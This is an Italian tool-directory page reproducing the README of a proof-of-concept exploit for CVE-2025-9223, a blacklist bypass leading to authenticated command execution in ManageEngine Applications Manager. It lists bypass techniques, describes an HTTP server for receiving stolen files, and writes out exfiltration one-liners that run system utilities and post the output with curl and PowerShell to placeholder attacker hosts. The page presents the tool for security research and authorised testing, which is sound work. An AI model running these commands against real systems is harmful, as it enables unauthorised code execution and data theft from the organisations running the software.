Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-9223 — POC CVE-2025-9223 | Kitploit
Strumenti/GitHubGitHub/networkkiller/cve-2025-9223
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebEsfiltrazione DatiPenetration TestingCommand and ControlApprendimento e Formazione
GitHubnetworkkiller/cve-2025-9223

CVE-2025-9223

POC CVE-2025-9223

Vedi Repository
29 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Applications Manager - PoC di Bypass dell'Azione di Esecuzione Programmi

Security Research Python 3.x Proof of Concept

📖 Descrizione

Questo repository contiene una Prova di Concetto (PoC) che dimostra una vulnerabilità di esecuzione di comandi nella funzione "Execute Program Action" di ManageEngine Applications Manager.

🔍 Dettagli della Vulnerabilità

Applications Manager utilizza una lista nera (BlackListCommands) per bloccare comandi pericolosi, ma la validazione presenta gravi difetti:

  • Validazione basata su stringhe solo sul primo token
  • Nessuna normalizzazione dei percorsi o espansione delle variabili d'ambiente
  • Nessuna protezione contro l'esecuzione indiretta tramite script

🚨 Metodi di Bypass

MetodoEsempio
Percorso AssolutoC:\Windows\System32\netstat.exe
Variabili d'Ambiente%SystemRoot%\System32\netstat.exe
Script Wrapperecho netstat > a.bat && a.bat

💥 Impatto

  • ✅ Esecuzione Remota di Codice (RCE) autenticata sull'host di Applications Manager
  • ✅ Esecuzione completa di comandi di sistema eludendo le restrizioni di sicurezza
  • ✅ Esfiltrazione di dati utilizzando utility di sistema (curl, powershell, certutil)

📤 Esempio di Payload di Esfiltrazione

root@kitploit:~
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload

🛠️ Configurazione e Utilizzo

Prerequisiti

  • Python 3.x
  • Accesso di rete all'istanza di Applications Manager target
  • Accesso autenticato con permessi di "Execute Program Action"

Server di Upload File

Lo script upload_server.py fornisce un semplice server HTTP per ricevere file esfiltrati.

Utilizzo Base

root@kitploit:~
python3 upload_server.py

Opzioni Avanzate

root@kitploit:~
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads

Parametri

  • --host: Indirizzo di bind (predefinito: 0.0.0.0)
  • --port: Porta HTTP (predefinita: 8000)
  • --dir: Directory di output (predefinita: directory corrente)

Endpoint API

Caratteristiche di Sicurezza

✅ Protezione contro il path traversal
✅ Nomi file univoci con timestamp
✅ Registrazione delle richieste con IP e User-Agent
✅ Validazione del tipo di contenuto

🎯 Comandi di Test

Crea un file test_commands.txt con esempi di bypass:

root@kitploit:~
# Bypass con percorso assoluto
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an

# Bypass con variabili d'ambiente
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe

# Bypass con script wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat

# Esempi di esfiltrazione dati
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"

⚠️ Avviso Legale

IMPORTANTE: Questo strumento è fornito esclusivamente a scopo educativo e per test autorizzati.

❌ NON usare su sistemi che non possiedi o per cui non hai il permesso esplicito di testare
❌ NON usare per alcuna attività illegale
✅ SÌ usare solo in ambienti controllati per la ricerca sulla sicurezza
✅ SÌ ottenere un'adeguata autorizzazione prima di effettuare test

L'autore non è responsabile di qualsiasi uso improprio di questo strumento. Gli utenti si assumono ogni responsabilità e rischio.

📄 Licenza

Questo progetto è solo a scopo di ricerca e educativo. Tutti i diritti riservati.

👨‍💻 Autore

Johan Aybar - A scopo educativo


⚠️ PROMEMORIA: Questa PoC deve essere utilizzata esclusivamente in ambienti di test autorizzati. L'uso non autorizzato può essere illegale ed è severamente vietato.

Scarica lo strumento
MetodoEndpointDescrizione
GET/Elenca i file caricati di recente
POST/uploadCarica file (multipart/form-data)
PUT/upload/[filename]Upload diretto di file